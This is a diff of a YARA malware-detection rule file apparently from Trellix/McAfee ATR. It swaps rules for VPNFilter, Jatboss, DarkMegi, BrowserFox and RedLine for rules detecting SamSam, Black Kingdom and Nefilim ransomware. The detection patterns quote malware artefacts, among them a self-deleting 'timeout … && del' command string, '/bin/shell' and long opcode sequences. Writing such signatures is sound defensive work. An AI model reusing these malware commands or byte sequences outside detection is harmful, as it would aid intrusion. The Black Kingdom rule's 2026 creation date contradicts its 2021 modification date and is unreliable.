+		$s9 = "Exception caught in process: {0}" fullword wide
+		$s10 = "Could not begin restart session.  Unable to determine file locker." fullword wide
+		$s11 = "samsam.Properties.Resources.resources" fullword ascii
+		$s12 = "EncryptStringToBytes" fullword ascii
+		$s13 = "recursivegetfiles" fullword ascii
+		$s14 = "RSAEncryptBytes" fullword ascii
+		$s15 = "encryptFile" fullword ascii
+		$s16 = "samsam.Properties.Resources" fullword wide
+		$s17 = "TSSessionId" fullword ascii
+		$s18 = "Could not register resource." fullword wide
+		$s19 = "<recursivegetfiles>b__0" fullword ascii
+		$s20 = "create_from_resource" fullword ascii
+		$op0 = { 96 00 e0 00 29 00 0b 00 34 23 }
+		$op1 = { 96 00 12 04 f9 00 34 00 6c 2c }
+		$op2 = { 72 a5 0a 00 70 a2 06 20 94 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 80KB and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 700KB and pe.imphash ( ) == "f34d5f2d4577ed6d9ceec516c1f5a744" and ( 1 of ( $x* ) and 4 of them ) and all of ( $op* ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Vpnfilter : BACKDOOR FILE
+
+rule TRELLIX_ARC_Samsam_Ransomware_Latest : RANSOMWARE FILE
 {
 	meta:
-		description = "Filter for 2nd stage malware used in VPNfilter attack"
-		author = "Christiaan Beek @ McAfee Advanced Threat Research"
-		id = "89bd7f94-d73c-5c5c-a3ec-0331f79e61fd"
-		date = "2018-05-23"
+		description = "Latest SamSA ransomware samples"
+		author = "Christiaan Beek"
+		id = "716b9282-013e-5194-8518-2fa1a4007095"
+		date = "2018-01-23"
 		modified = "2020-08-14"
-		reference = "https://blog.talosintelligence.com/2018/05/VPNFilter.html"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_VPNfilter.yar#L1-L40"
+		reference = "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_SamSam.yar#L54-L105"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "9eb6c779dbad1b717caa462d8e040852759436ed79cc2172692339bc62432387"
-		logic_hash = "88f08765dff632f0c08e985181309e5c3ac9cdaa51d05d8485c411fb1a183cca"
-		score = 75
-		quality = 70
-		tags = "BACKDOOR, FILE"
+		hash = "88e344977bf6451e15fe202d65471a5f75d22370050fe6ba4dfa2c2d0fae7828"
+		logic_hash = "06703479795fdef64813471f11b275df544c90d5bcece4817d415cd504d7b317"
+		score = 50
+		quality = 68
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/VPNfilter"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/SamSam"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "id-at-postalAddress" fullword ascii
-		$s2 = "/bin/shell" fullword ascii
-		$s3 = "/DZrtenNLQNiTrM9AM+vdqBpVoNq0qjU51Bx5rU2BXcFbXvI5MT9TNUhXwIDAQAB" fullword ascii
-		$s4 = "Usage does not match the keyUsage extension" fullword ascii
-		$s5 = "id-at-postalCode" fullword ascii
-		$s6 = "vTeY4KZMaUrveEel5tWZC94RSMKgxR6cyE1nBXyTQnDOGbfpNNgBKxyKbINWoOJU" fullword ascii
-		$s7 = "id-ce-extKeyUsage" fullword ascii
-		$s8 = "/f8wYwYDVR0jBFwwWoAUtFrkpbPe0lL2udWmlQ/rPrzH/f+hP6Q9MDsxCzAJBgNV" fullword ascii
-		$s9 = "/etc/config/hosts" fullword ascii
-		$s10 = "%s%-18s: %d bits" fullword ascii
-		$s11 = "id-ce-keyUsage" fullword ascii
-		$s12 = "Machine is not on the network" fullword ascii
-		$s13 = "No XENIX semaphores available" fullword ascii
-		$s14 = "No CSI structure available" fullword ascii
-		$s15 = "Name not unique on network" fullword ascii
+		$s1 = "bedf08175d319a2f879fe720032d11e5" fullword wide
+		$s2 = "ksdghksdghkddgdfgdfgfd" fullword ascii
+		$s3 = "osieyrgvbsgnhkflkstesadfakdhaksjfgyjqqwgjrwgehjgfdjgdffg" fullword ascii
+		$s4 = "5c2d376c976669efaf9cb107f5a83d0c" fullword wide
+		$s5 = "B917754BCFE717EB4F7CE04A5B11A6351EEC5015" fullword ascii
+		$s6 = "f99e47c1d4ccb2b103f5f730f8eb598a" fullword wide
+		$s7 = "d2db284217a6e5596913e2e1a5b2672f" fullword wide
+		$s8 = "0bddb8acd38f6da118f47243af48d8af" fullword wide
+		$s9 = "f73623dcb4f62b0e5b9b4d83e1ee4323" fullword wide
+		$s10 = "916ab48e32e904b8e1b87b7e3ced6d55" fullword wide
+		$s11 = "c6e61622dc51e17195e4df6e359218a2" fullword wide
+		$s12 = "2a9e8d549af13031f6bf7807242ce27f" fullword wide
+		$s13 = "e3208957ad76d2f2e249276410744b29" fullword wide
+		$s14 = "b4d28bbd65da97431f494dd7741bee70" fullword wide
+		$s15 = "81ee346489c272f456f2b17d96365c34" fullword wide
+		$s16 = "94682debc6f156b7e90e0d6dc772734d" fullword wide
+		$s17 = "6943e17a989f11af750ea0441a713b89" fullword wide
+		$s18 = "b1c7e24b315ff9c73a9a89afac5286be" fullword wide
+		$s19 = "90928fd1250435589cc0150849bc0cff" fullword wide
+		$s20 = "67da807268764a7badc4904df351932e" fullword wide
+		$op0 = { 30 01 00 2b 68 79 33 38 68 34 77 65 36 34 74 72 }
+		$op1 = { 01 00 b2 04 00 00 01 00 84 }
+		$op2 = { 68 09 00 00 38 66 00 00 23 55 53 00 a0 6f 00 00 }
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 500KB and ( 8 of them ) ) or ( all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and pe.imphash ( ) == "f34d5f2d4577ed6d9ceec516c1f5a744" and ( 8 of them ) and all of ( $op* ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Jatboss : PHISHING FILE
+rule TRELLIX_ARC_Ransom_Black_Kingdom : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect PDF files from Jatboss campaign and MSG files that contained those attachents"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "009a7486-2ee8-57ef-8dfd-fcbd035b4e85"
-		date = "2019-12-04"
-		modified = "2020-08-14"
-		reference = "https://exchange.xforce.ibmcloud.com/collection/JATBOSS-Phishing-Kit-17c74b38860de5cb9fc727e6c0b6d5b5"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_jatboss.yar#L1-L36"
+		description = "Rule to detect Black Kingdom ransomware that is spread using the latest Exchange vulns"
+		author = "McAfee ATR"
+		id = "c38e6dbf-7fb9-52f0-acd0-f824647b6041"
+		date = "2026-03-01"
+		modified = "2021-04-06"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/ransom_BlackKingDom.yar#L3-L49"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "b81fb37dc48812f6ad61984ecf2a8dbbfe581120257cb4becad5375a12e755bb"
-		logic_hash = "5e6e4c8f6c0896623f166a98eb83a9a4f23139306671cf2e35ba239b2dc191fc"
-		score = 75
-		quality = 66
-		tags = "PHISHING, FILE"
-		rule_version = "v1"
-		malware_type = "phishing"
-		malware_family = "Phishing:W32/Jatboss"
+		logic_hash = "334e84a9469367ed64509203feb61b5f64d5a7e38d29ff5c5089631246b06588"
+		score = 50
+		quality = 68
+		tags = "RANSOMWARE, FILE"
+		malware_type = "ransomware"
+		malware_family = "Ransomware:W32/BlackKingdom_March2021"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$jat = { 3C 3C 2F 41 75 74 68 6F 72 28 4A 41 54 29 20 2F 43 72 65 61 74 6F 72 28 }
-		$jatboss = { 3C 3C 2F 41 75 74 68 6F 72 28 4A 41 54 29 20 2F 43 72 65 61 74 6F 72 28 }
-		$spam = { 54 00 68 00 69 00 73 00 20 00 65 00 2D 00 6D 00 61 00 69 00 6C 00 20 00 61 00 6E 00 64 00 20 00 61 00 6E 00 79 00 20 00 61 00 74 00 74 00 61 00 63 00 68 00 6D 00 65 00 6E 00 74 00 20 00 61 00 72 00 65 00 20 00 43 00 6F 00 6E 00 66 00 69 00 64 00 65 00 6E 00 74 00 69 00 61 00 6C 00 2E 00 }
+		$0 = {7D3F634F627C5EC4D893189F1731F624A6AD458C3D89E9CB22C69EC4B4B588B1A7307D8963EC294C5B718C3D85692B8EB1A730732F8EB16F65EA5CEC17834A665E}
+		$1 = {3E774F2038FDE77377253CD11BFEB6FB82CF6A03E1B34E134C78A2CFDC1B7CD63AD167EE4E78A227FEF694EE3369143D1B0E84CF7CDAE7C3037C263DD15B979F}
+		$2 = {0C674D0A2427CDDD9B68213EC0B4A5DF94B19D39BEC0C562346FC7A1D32C0FA5BC9D963440910709A2365360650F5A909685912220EEC0F8157B3E2B95EA2CE9}
+		$3 = {7B7251266178C52BA731333F9E8A1C327A239FB81B901BAB2755FCAFD8A753F47991516A5C98A6CAAC9A1D5065DE565D87F120B3519DD91E09D353B7120EF9F2}
+		$4 = {2E233E25767037CA68F9C0F026A5CDDCC08FC0DCE21F61C612F1983A29BD3D986F8239A7692B0EBD478B6C8115564D5B0671346CF7CDDB612247EA7A4FAA7C71}
+		$5 = {2B2C3249094C8A1A9734E7515D10F78FD1B9339DF1902AC1D4ADE70C27C8A2CA7F3416B7B9F0D10E67519D589B8AD64D6435CC2DF4C2092A4BCEF7053B194AE5}
+		$6 = {0B297C7D79ECD339B30E87775B6769909CD886D1FBBAF2041DCC4FB11B5BA777AA626A9E8CAC14F64BEA5299A8E304A22BA25FA4F7AC4B95E8ACC42EC33A3DE4}
+		$7 = {0D46503D4DFD825DED41C94C055E1FCE1134C6F63AD80DCD7427F4BD502FA186077BD22653AB098C96ECDDA26557FB82BBA053CB2067C9DEA7EE0AF6A44C468A}
+		$8 = {2E774F2038FDE77277253CD11BFEB6FB82CB6A03E1B34E134C78A2CFDC1B5CD63AD167EE4E78A227FEF694EE3269143D1B0E84CF7CDAE5C3035C263DD15B979B}
+		$9 = {5C4250510A8DEF3463BF7410DEE0E72759B8A94A4D0544BD9B4FC0846E61844F4E06B779ABF906A450F5A2AC4C57CF761798C539175F092FD2429DC27909E382}
+		$10 = {7C787B386177B4D7F1F6B9E6FE17154FF15BD9E3F1DA94A1E1064654E7500A0B86A20A4AA16BD4E16F19A8733960DE868F10F382CDEEC1F15CE718839241DA10}
+		$11 = {2C3C6F6B2E597AC746FF7664087C7E899ABCC27AC60FA545D9CF4323063896D299F57132FE3E63E567EBFADF296365A1B2C0163DD8A4F3DABA04C77FA39A99CB}
+		$12 = {7B3C5D7C73D34D1A6C66B91990D162CACD89ECEAF591AC56C95AB3151EBAC1687FB749924B7BC27917FE50CA6C1417FEDBCC5BA2B7C03B1AEE4F5732E69DAC14}
+		$13 = {406357775C42584F11A1610D3A8A31F094FA252BC3E10738BD310D536D3A2F9EC5C21996AC4DCF5237AE3A4467D5678EE2983E4282ADFB1FDEA16352109BA7A7}
+		$14 = {2F265663680CACC66731B11AA78D588D7B54AC06C6348905D6B8F52C608D8208B0C6C5F1C11A2F69608D363DFA2A365AA387DAFCC906B486548F3DA8FE36312E}
+		$15 = {2B37480D634C799C468B775404368C7B891ADE3A556DF888566EB8CB3ED6F0171B59C35BB57F3B75D9017B7C9D52D1E87F48795AA58A16695B98BAFEAF66A769}
+		$16 = {0A76372D4F488ED5649A19B42E9E42B1DCC2E62655E7041711A6235B825D791CD6519492309D46964594F78B1DCAD17A5BEA574166B8A8EB76A52CA1052D724A}
+		$17 = {3D0B635F789C6CA6ADAC549548AA509C99D0C8DD823C99704423B90175B062E70EBBA67F937D622FF41B59D21E763A26D36759F3297D12B7454D82676C5B7B4A}
+		$18 = {225B642B7A09E7B06A4D3B95D97927AC46DABAE3ECE93AA4B307259DB9C01361C905B240678DB830EB7E172EB939ECB188ED3504B3709A746772B7BC94C83FB6}
+		$19 = {27465E49761EECAF449A3AB147907CF1C3D5F161D353E236BF9940AEC099EA4AC0352576803626029A15B3E978AB84D0024A1E345FFE58A81CDA2FBD61408971}
+		$20 = {3B7431210BEE4762B447DF044B5D6F41D53824C3E2CD17A35D71029352B47DA3811C60458EAADEBA532F75C54A3DDFC74AB3BEA7A51AF81A4A688F5D7A10378C}
+		$21 = {276C41453F8F2D8279980EAD3328E2478A3D84C55EB668231A12EED150E496622FCB2C04D9CBCE257BD97B9ECE404037589A185573F936A78DA88AD43EFC3948}
+		$22 = {2727495F5B1B4D920E35A52B6A5DB6A7F8B31A26873E20C53388696567D692B4B1F4A0B9267E4BBDA1728A5E883FD69029A07669AC1D0DC22E3157C028705C19}
+		$23 = {3E5552672C26C4F22824AF196F222D370F9EEDBEF119B8C3DD96414CF3529912234CB08AA7B2A034A51635319EAC44D47FA68747BA4B2FD2A884373ADEFB5C84}
+		$24 = {20735E632C6C70375BCA935EE39B7FA508205E9CC034CBD193A0D1C1E3A9A13818B9EB7FEFB11891E71221DB7143286C7D36A91C1FF7615E38F02E5C1BA24AFF}
+		$25 = {0A3D69344860D944AA8A46908019AB085E025AA693D381A34D8DCF116B25B0C62355D93893D1F64B983986C7E956C22303A9AB109680BF4B74460C5B087412AF}
+		$26 = {7C5B79652BC66C9BC36B11730D556FFA1CA1616CA59C0C344FD1F6B50C9C259329D699CDF0B894F1540AFDC4F431957206B0748AB6AE3B9069CD91147E09709B}
+		$27 = {2257442B42DB79A5E6CAD745E9A8D9775E4216C95F6094A05F05D7DAADBB03EC4B3444983DD291C2E32FC39299BCB4D22219386E75DAABB8D2EA93DFC52A248B}
+		$28 = {3C0D4A68792594D2F23F10A465B38B75D272318CA0E532A8A183F8CE5DEE6B45ECFDC96E4FF9158832472ED8CDFA69F92868A503F821D848CBB97B58332D8F84}
 
 	condition:
-		( uint16( 0 ) == 0x5025 and filesize < 1000KB and ( $jat or $jatboss ) ) or ( uint16( 0 ) == 0xcfd0 and $spam and any of ( $jat* ) )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule TRELLIX_ARC_Downloader_Darkmegi_Pdb : DOWNLOADER FILE
+rule TRELLIX_ARC_Nefilim_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect DarkMegi downloader based on PDB"
+		description = "Rule to detect Nefilim ransomware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "3ccc3685-e05b-5620-9198-24733fb1e7eb"
-		date = "2013-03-06"
-		modified = "2020-08-14"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_downloader_darkmegi.yar#L1-L25"
+		id = "55d9cb20-5071-5dce-a46f-a20816ba379f"
+		date = "2020-03-17"
+		modified = "2020-04-03"
+		reference = "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_NEFILIM.yar#L3-L48"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "bf849b1e8f170142176d2a3b4f0f34b40c16d0870833569824809b5c65b99fc1"
-		logic_hash = "47faf8c5296e651f82726a6e8a7843dfa0f98e7be7257d2c03efcff550f52140"
+		hash = "5ab834f599c6ad35fcd0a168d93c52c399c6de7d1c20f33e25cb1fdb25aec9c6"
+		logic_hash = "d8cd5d2dd552d3e9f57f7bd244e941fe89a96ab16bbcc71911e8e2a519f53f03"
 		score = 75
 		quality = 70
-		tags = "DOWNLOADER, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "downloader"
-		malware_family = "Downloader:W32/DarkMegi"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Nefilim"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\RKTDOW~1\\RKTDRI~1\\RKTDRI~1\\objchk\\i386\\RktDriver.pdb"
+		$s1 = "C:\\Users\\Administrator\\Desktop\\New folder\\Release\\NEFILIM.pdb" fullword ascii
+		$s2 = "oh how i did it??? bypass sofos hah" fullword ascii
+		$s3 = " /c timeout /t 3 /nobreak && del \"" fullword wide
+		$s4 = "NEFILIM-DECRYPT.txt" fullword wide
+		$op0 = { db ff ff ff 55 8b ec 83 ec 24 53 56 57 89 55 f4 }
+		$op1 = { 60 be 00 d0 40 00 8d be 00 40 ff ff 57 eb 0b 90 }
+		$op2 = { 84 e0 40 00 90 d1 40 00 08 }
+		$bp = { 558B??83????53565789????29????6A??8D????8D????5A8B??89????8A????88????8B????8A????88??8A????88????8A??88????03??03??FF????75??89????8D????8D????8D????89????89????29????89????29????89????29????8D????8D????89????29????89????29????8B????89????29????8D????F6??????8B????8A????8B????8A????8A??88????8B????8A????88????75??0FB6??8A??????????0FB6??88????8A??????????0FB6????8A??????????88????0FB6????8A??????????88????8B????C1????32??????????8B????8A????32??8B????88????8A????32??88????8A??32????83????88????8B????8A????32????FF????88??83????83????83??????0F82????????5F5E5BC9C3558B??560FB6??57C1????03????6A??5F6A??5E8A??30??40414E75??4F75??5F5E5DC356576A??5F6A??8B??5E0FB6??8A??????????88??83????4E75??414F75??5F5EC38A????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????88????C3558B??5153566A??83????5E8A????32??8A????8A????88????32??32??88????88????32??8A??C0????B3??F6??02??32??32????8A????32????32??88????8A??C0????F6??02??32??32????8A????32????88????8A??C0????F6??02??32??32??8A????32????32????88??8A??C0????F6??02??32??32????83????32????4E88????75??5E5BC9C3558B??53FF????8B??32??E8????????59B3??8B??E8????????8B??E8????????8B??E8????????FF????8B??8A??E8????????FE??5980????72??8B??E8????????8B??E8????????5B8B??B0??5DE9????????558B??81??????????53568D??????????E8????????33??6A??5939????76??5783????75??8B????8D????A5A5A58D??????????A5508D????E8????????596A??588B????8D????80????75??48C6????79??EB??FE????33??8A??????8B????30????43413B????72??5F8B????8B????6A??2B??5E8A????88??404E75??5E5BC9C3558B??81??????????53FF????8D??????????50FF??????????68????????8D??????????50FF??????????33??53536A??535368????????8D??????????50FF??????????89????3B??0F84????????56578D????5053BE????????5689????FF??????????5056E8????????83????85??75??53FF??????????FF????8B??????????53FF??50FF??????????8D????51505689????FF??????????5056E8????????83????85??74??8B????89????8D????50FF????E8????????59595385??74??8D????50FF????FF????FF????FF??????????FF????53FF??50FF??????????5F5E5BC9C3558B??83????81??????????535657FF????8D????????????50FF??????????8B??????????68????????8D????????????50FF??8D??????508D????????????50FF??????????89??????83????0F84????????8B??????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????F6????????FF????8D????????????5074??FF??????????8D??????508D????????????50FF??68????????8D????????????50FF??8D????????????50E8????????E9????????FF??????????8D??????508D????????????50FF??8D??????50E8????????8B??C7????????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????8D??????50FF??85??74??8D????????????50E8????????598D??????50FF??????FF??????????85??0F85????????FF??????FF??????????5F5E5B8B??5DC3558B??81??????????53565768????????FF??????????8B??????????5033??57FF??8B??????????50FF??68????????89????FF??????????89????B8????????39????74??8B????2B??8A??FF????88????4039????75??57576A??575768????????FF????FF??????????89????3B??0F84????????8D????5150FF??????????6A??57FF??50FF??6A??5789????FF??50FF??FF????89????E8????????FF????E8????????595968????????57FF??50FF??68????????5789????FF??50FF??FF????8B????89????E8????????FF????8B????E8????????8B??????????59595757FF????FF????FF????FF??57FF??????????578D????5068????????FF????FF????FF??????????FF??????????83????0F84????????FF??????????83????0F84????????8B????8B????5705????????5713??5150FF????FF??578D????5068????????FF????FF????FF??????????8B????8B????5705????????5713??5150FF????FF??578D????5068????????FF??????????50FF????FF????FF??????????8B????8B????3B??0F8C????????7F??81??????????0F86????????89????89????3B??0F8C????????7F??3B??0F86????????EB??8B????2B????1B????89????0F88????????7F??81??????????0F82????????68????????57FF??50FF??????????5757FF????89????FF????FF????FF??578D????5068????????FF????FF????FF??????????FF????8B????FF????68????????FF????E8????????83????5757FF????FF????FF????FF??578D????5068????????FF????FF????FF??????????FF??FF????5750FF??????????81????????????8B????11????39????0F8C????????0F8F????????8B????39????0F82????????E9????????3B??7C??7F??81??????????76??68????????57FF??50FF??????????575733??89????5133??50FF????FF??578D????5068????????FF????FF????FF??????????FF????8B????FF????68????????FF????E8????????83????575733??5050FF????FF??578D????5068????????EB??5157FF??50FF??????????575733??89????5133??50FF????FF??578D????50FF????FF????FF????FF??????????FF????8B????FF????FF????FF????E8????????83????575733??5050FF????FF??578D????50FF????FF????FF????FF??????????FF????57FF??50FF??????????FF????FF??????????FF????57FF??8B??????????50FF??FF???? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 20000KB and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of ( $s* ) or all of ( $op* ) or $bp
 }
-rule TRELLIX_ARC_Malw_Browser_Fox_Adware : ADWARE FILE
+
+rule TRELLIX_ARC_Nefilim_Signed : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Browser Fox Adware based on the PDB reference"
+		description = "Rule to detect Nefilim samples digitally signed"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "67d20c3a-4e9d-5fbf-b26a-d7b5fb270d12"
-		date = "2015-01-15"
+		id = "a9a5daf0-4cfb-556a-b20a-72283fb1a0f9"
+		date = "2020-04-02"
 		modified = "2020-08-14"
-		reference = "https://www.sophos.com/en-us/threat-center/threat-analyses/adware-and-puas/Browse%20Fox.aspx"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_browser_fox_adware.yar#L1-L25"
+		reference = "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_NEFILIM.yar#L50-L72"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "c6f3d6024339940896dd18f32064c0773d51f0261ecbee8b0534fdd9a149ac64"
-		logic_hash = "462a05de46ec0d710cac80a05d4935279a43f49cbd5ef49c072f277982a76fce"
+		hash = "353ee5805bc5c7a98fb5d522b15743055484dc47144535628d102a4098532cd5"
+		logic_hash = "7625eb7de1ebb2f5410552b8983379f213d639f5e146a5d951975b69eb8111d3"
 		score = 75
 		quality = 70
-		tags = "ADWARE, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "adware"
-		malware_family = "Adware:W32/BrowserFox"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Nefilim"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
-	strings:
-		$pdb = "\\Utilities\\130ijkfv.o4g\\Desktop\\Desktop.OptChecker\\bin\\Release\\ BooZaka.Opt"
-
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Red GmbH/CN=Red GmbH" and pe.signatures [ i ] . serial == "00:b8:81:a7:2d:41:17:bb:c3:8b:81:d3:c6:5c:79:2c:1a" or pe.signatures [ i ] . thumbprint == "5b:19:58:8b:78:74:0a:4c:5d:08:41:99:dc:0f:52:a6:1f:38:00:99" )
 }
-rule TRELLIX_ARC_Redline_Payload : BACKDOOR FILE
+rule TRELLIX_ARC_RANSOM_Nefilim_Go : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the RedLine payload"
+		description = "Rule to detect the new Nefilim written in GO"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "61c2032f-1e6b-5123-8f99-ff83ae95e8a9"
-		date = "2020-04-16"
+		id = "a8809060-c646-5d54-88e7-c8054305ee6c"
+		date = "2020-07-13"
 		modified = "2020-08-14"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_redline.yar#L1-L38"
+		reference = "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_NEFILIM.yar#L74-L98"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "5df956f08d6ad0559efcdb7b7a59b2f3b95dee9e2aa6b76602c46e2aba855eff"
-		logic_hash = "44df161b7434b9137ca5bb919eb314f8447b216b3f6e1214606a898fb36ee4f4"
+		hash = "a51fec27e478a1908fc58c96eb14f3719608ed925f1b44eb67bbcc67bd4c4099"
+		logic_hash = "f0b10286fb1623a32bcf1f30cadce2901f7711cb36db6bbe812f6c2e03862270"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/RedLine"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Nefilim"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "Cambrel.exe" fullword ascii
-		$s2 = { 22 00 54 00 65 00 78 00 74 00 49 00 6e 00 70 00 75 00 74 00 46 00 72 00 61 00 6d 00 65 00 77 00 6f 00 72 00 6b 00 2e 00 44 00 59 00 4e 00 4c 00 49 00 4e 00 4b 00 22 00 }
-		$op0 = { 06 7c 34 00 00 04 7b 17 00 00 04 7e 21 00 00 0a }
-		$op1 = { 96 00 92 0e 83 02 02 00 f4 20 }
-		$op2 = { 03 00 c6 01 d9 08 1b 03 44 }
-		$p0 = { 80 00 96 20 83 11 b7 02 10 }
-		$p1 = { 20 01 00 72 0f 00 20 02 00 8a 0f 00 20 03 00 61 }
-		$p2 = { 03 00 c6 01 cd 06 13 03 79 }
+		$pattern = { FF20476F206275696C642049443A20226A744368374D37436A4A5732634C5F636633374A2F49625946794336635A64735F4D796A56633461642F486B6D36694A4D39327847785F4F2D65746744692F664E37434C43622D59716E374D795947565A686F220A20FFCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108766B83EC0CC744241400000000C7442418000000008B4424108400890424E88D0200008B44240485C0740789C183F8FF7514C744241400000000C74424180000000083C40CC3894C24088B44241083C004890424E8570200008B4424048B4C2408894C24148944241883C40CC3E8AE5A0400E979FFFFFFCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86EC00000083EC108B44241885C00F84C30000008B4424148400890424E8FD0100008B44240485C0742E89C183F8FF74E38B44241839C10F85800000008B44241C894424048B44241483C004890424E88B12000083C410C3E8620303008B442414890424C744240400000000C7442408FFFFFFFFE8A61200000FB644240C84C07507E868030300EB8B8B44241C894424048B4424148D4804890C24E83F1200008B442418894424048B442414890424E82B120000E83603030083C410C38D05408E4E008904248D05B8CC510089442404E8DA3F02000F0B8D05408E4E008904248D05B0CC510089442404E8C03F02000F0BE899590400E9F4FEFFFFCCCCCCCCE90B000000CCCCCCCCCCCCCCCCCCCCCC8B6C24048B4424088B4C240CF00FB14D000F94442410C3CCCCCCCCCCCCCCCCCCE9DBFFFFFFCCCCCCCCCCCCCCCCCCCCCC8B6C2404F7C50700000074068B05000000008B4424088B54240C8B5C24108B4C2414F00FC74D000F94442418C3CCCCCCE90B000000CCCCCCCCCCCCCCCCCCCCCC8B6C24048B44240889C1F00FC1450001C1894C240CC3CCCCCCCCCCCCCCCCCCCC8B6C2404F7C50700000074068B05000000008B7424088B7C240C8B45008B550489C389D101F311F9F00FC74D0075F1895C2410894C2414C3CCCCCCCCCCCCCCCC8B4424048B0089442408C3CCCCCCCCCC8B442404A907